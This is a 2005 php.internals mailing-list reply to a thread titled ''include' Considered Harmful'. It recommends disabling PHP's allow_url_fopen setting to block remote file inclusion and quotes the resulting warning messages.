Newsgroups: php.internals Path: news.php.net Xref: news.php.net php.internals:16898 Return-Path: Mailing-List: contact internals-help@lists.php.net; run by ezmlm Delivered-To: mailing list internals@lists.php.net Received: (qmail 60484 invoked by uid 1010); 24 Jun 2005 20:51:51 -0000 Delivered-To: ezmlm-scan-internals@lists.php.net Delivered-To: ezmlm-internals@lists.php.net Received: (qmail 60452 invoked from network); 24 Jun 2005 20:51:50 -0000 Received: from unknown (HELO pb1.pair.com) (127.0.0.1) by localhost with SMTP; 24 Jun 2005 20:51:50 -0000 X-Host-Fingerprint: 69.231.197.46 adsl-69-231-197-46.dsl.irvnca.pacbell.net Received: from ([69.231.197.46:4585] helo=localhost.localdomain) by pb1.pair.com (ecelerity 1.2 r(5656M)) with SMTP id 6C/55-22648-2627CB24 for ; Fri, 24 Jun 2005 16:51:46 -0400 Message-ID: <6C.55.22648.2627CB24@pb1.pair.com> To: internals@lists.php.net Date: Fri, 24 Jun 2005 13:51:47 -0700 User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 References: <20050624055017.25065.qmail@desk.crynwr.com> In-Reply-To: <20050624055017.25065.qmail@desk.crynwr.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Posted-By: 69.231.197.46 Subject: Re: 'include' Considered Harmful From: unknown@simplemachines.org ("Unknown W. Brackets") Why not simply disable allow_url_fopen on your server or servers? With it set off, you get these errors: Warning: main() [function.main]: URL file-access is disabled in the server configuration in .../test.php on line 3 Warning: main(http://www.google.com/) [function.main]: failed to open stream: no suitable wrapper could be found in .../test.php on line 3 Warning: main() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.') in .../test.php on line 3 Now, yes, some scripts work better with that setting on, but it is *the* setting to disable if you're worried about naive programmers. You can even allow them to turn it back on with Apache's .htaccess. -[Unknown] > I believe that the 'include' operator is intrinsically harmful. As > evidence I introduce three exhibits: Google for "php security flaw". > The very first page you find will explain how a very common use of > 'include' is insecure. As the second bit of evidence, I introduce the > fact both of the naive php programmers working on my server introduced > this security flaw in separate web pages. As the third bit of > evidence, I point out that crackers have created security tools > designed specifically to exploit this flaw.